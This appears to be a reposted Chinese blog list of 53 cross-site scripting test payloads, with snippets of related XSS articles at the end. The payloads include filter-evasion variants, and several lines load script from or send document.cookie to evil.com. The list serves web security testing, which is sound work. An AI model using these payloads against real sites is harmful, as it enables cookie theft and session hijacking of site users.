xss测试用例

1.<script> alert(1);</script>

2.<script>alert(‘xss‘);</script>

3.<script  src="http://www.evil.com/cookie.php"></script>

4.<script>location.href="http://www.evil.com/cookies.php?cookie="+escape(document.cookie)"</script>

5.<scr<script>ipt>alert(‘xss‘);</scr</script>ipt>

6.<img src=liu.jpg onerror=alert(/xss/)/>

7.<style>@im\port‘\ja\vasc\ript:alert(\"xss\")‘;</style>

8.<?echo(‘<src)‘; echo(‘ipt>alert(\"xss\")‘;</script>‘);?>

9.<marquee><script>alert(‘xss‘)</script></marquee>

10.<IMG SRC=\"jav&#0x9;ascript:alert(‘xss‘);\">

11.<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

12."><script>alert(1)</script>

13.<script src=http://www.evil.com/files.js></script>

14.</title><script>alert(/xss/)</script>

15.</textarea><script>alert(/xss)</script>

16.<IMG LOWSRC=\"javascript:alert(‘XSS‘)\">

17.<IMG DYNSRC=\"javascript:alert(‘XSS‘)\">

18.<font style=‘color:expression(alert(document.cookie))‘>

19.‘);alert(‘XSS

20.<img src="javascript:alert(‘XSS‘)">

21.[url=javascript:alert(‘XSS‘);]click me[/url]

22.<body onunload="javascript:alert(‘XSS‘);">

23.<body onLoad="alert(‘XSS‘);"

24.[color=red‘ onmouseover="alert(‘XSS‘)"]mouse over[/color]

25."/></a></><img src=1.gif onerror=alert(1)>

26.window.alert("XSS");

27.<div style="x:expression((window==1)?":eval(‘r=1;alert(String.fromCharCode(83,83,83));‘))">

28.<iframe<?php eval chr(11)?>onload=alert(‘XSS‘)></iframe>

29."><script alert(String.fromCharCode(88,83,83))</script>

30.‘>><marquee><h1>XSS<h1></marquee>

31.‘">><script>alert(‘xss‘)</script>

32.‘">><marquee><h1>XSS</h1></marquee>

33.<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(‘XSS‘);\">

34.<META HTTP-EQUIV=\"refresh\"CONTENT=\"0;URL=http://;url=javascript:alert(‘XSS‘);\">

35.<script>var var=1; alert(var)</script>

36.<STYLE type="text/css">BODY{background:url("javascript:alert(‘XSS‘)")}</STYLE>

37.<?=‘<SCRIPT>alert("XSS")</SCRIPT>‘?>

38.<IMG SRC=‘vbscript:msgbox(\"XSS\")‘>

39."onfocus=alert(document.domain)"><"

40.<FRAMESET><FRAME SRC=\"javascript:alert(‘XSS‘);\"></FRAMESET>

41.<STYLE>li {list-style-image:url(\"javascript:alert(‘XSS‘)\");}</STYLE><UL><LI>XSS

42.<br size=\"&{alert(‘xss‘)}\">

43.<scrscriptipt>alert(1)</scrscriptipt>

44."><BODY onload!#$%&()*~+-_.,:;[email protected][/|\]^`=alert("XSS")>

45.[color=red width=expression(alert(123))][color]

46.<BASE HREF="javascript:alert(‘XSS‘);//">

47.Execute(MsgBox(chr(88)&&chr(83)&&chr(83)))<

48."></iframe><script>alert(123)</script>

49.<body onLoad="while(true) alert(‘XSS‘);">

50."<marquee><img src=k.png onerror=alert(/xss/) />

51.<div style="background:url(‘javascript:‘)

52.<img src=‘java\nscript:alert(\"XSS\")‘>

53.>‘"><img src="javascript:alert(‘xss‘)">

原文地址:https://www.cnblogs.com/bl8ck/p/9610294.html

时间: 2024-11-03 19:13:22

xss测试用例的相关文章

XSS测试用例与原理讲解

1.<a href="javascript:alert(32)">DIBRG</a>2.<img href="javascript:alert(32)">   在IE下可以,在FF下不可以3.<img src=" http://xss.jpg" onerror=alert('XSS')>     IE,FF下均可4.<img STYLE="background-image: url(

xss测试用例小结

<script>alert("跨站")</script> (最常用) <img scr=javascript:alert("跨站")></img> <img scr="javascript: alert(/跨站/)></img> <img scr="javas????cript:alert(/跨站/)" width=150></img> (?

xss、SQL测试用例小结

xss测试用例小结: <script>alert("跨站")</script> (最常用)<img scr=javascript:alert("跨站")></img><img scr="javascript: alert(/跨站/)></img><img scr="javas????cript:alert(/跨站/)" width=150></im

XSS初探

1 什么是XSS跨站脚本 跨站脚本是一种经常出现在Web应用程序中的计算机安全漏洞,是由于Web应用程序对用户输入过滤不足而产生的.攻击者利用网站漏洞把恶意的脚本代码注入到网页之中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害者可能采取Cookie资料盗取.会话劫持.钓鱼欺骗等各种攻击. XSS跨站脚本本身对WEB服务器没有直接危害,它借助网站进行传播,使网站的大量用户受到攻击.攻击者一般通过留言.电子邮件或其他途径向受害者发送一个精心构造的恶意URL,当受害者在Web浏览器中打开该

exp2:// 一次存储型XSS从易到难的挖掘过程

一日在某站点发现一个找茬活动,感觉是另类的src就参与了一下.就发生了这次有趣的XSS测试过程. 0×00 开始 (注意1)XSS不仅存在于页面上直观所在的位置,所有用户输入的信息都有可能通过不同形式返回到页面上,因此直接操作数据包来查找XSS显得更加有效. 回到该站点,在该站点一处生成app处存在一处忘记过滤. 发送的数据包如下: appName=TEST&icon=&loadimage=%2Ftemplate201309%2F29%2Floadimage%2F1a8aaba1-42bd

测试基础知识(白盒测试,黑盒测试,测试用例,功能测试等等)

测试基础知识 找实习工作的过程中总结了下测试基础知识,编程能力重要,测试基础同样重要,希望对大家有帮助 软件测试方法:静态测试和动态测试                     白盒测试和黑盒测试                     传统测试与面向对象测试 软件测试过程:单元测试,集成测试,系统测试,验收测试 按测试类型:功能.性能.界面.易用性测试.兼容性测试.安全性测试.安装测试 (单元测试:在编码过程中,对每个小程序单元测试) (集成测试:将单元集成在一起后,可称为组件) 回归测试.冒

使用Fiddler的X5S插件查找XSS漏洞

OWASP top 10的安全威胁中的CrossSite Scripting(跨站脚本攻击),允许攻击者通过浏览器往网站注入恶意脚本.这种漏洞经常出现在web应用中需要用户输入的地方,如果网站有XSS漏洞,攻击者就可以通过这种漏洞向浏览网站的用户发送恶意脚本,同时也可以利用该漏洞偷取sessionid,用来劫持用户帐户的会话. 所以网站开发者必须针对这种攻击进行适当的测试,必须过滤网站的每个输入及输出.为了使漏洞检测更容易,也可以使用各种扫描器,有很多自动或手动工具可以帮我们查找这些漏洞.X5S

(转) fuzzing XSS filter

//转自isno在wooyun知识库所写 题记:这是09年自己写的总结文章,之后多年也不搞这个了,技术显然是过时了,但我觉得思路还是有用的,算抛砖引玉吧,各位见笑 0x00 前言 这是一篇学习总结,首先对几位未曾谋面也不知道名字的老师表示感谢,通过对你们大作的学习,使我逐渐入门开始跨入XSSer的行列,虽然我现在的水平和大师们比起来还差得太远,脚本方面的基础也不不行,但我会继续努力学习. 0x01 概述 曾经有一度,在N年前,我对网络安全对抗的总结就是“过滤与反过滤”,虽然现在看起来这种理解太狭

Web应用进行XSS漏洞测试

转自:http://www.uml.org.cn/Test/201407161.asp 对 WEB 应用进行 XSS 漏洞测试,不能仅仅局限于在 WEB 页面输入 XSS 攻击字段,然后提交.绕过 JavaScript 的检测,输入 XSS 脚本,通常被测试人员忽略.下图为 XSS 恶意输入绕过 JavaScript 检测的攻击路径. 常见的 XSS 输入 XSS 输入通常包含 JavaScript 脚本,如弹出恶意警告框:<script>alert("XSS");<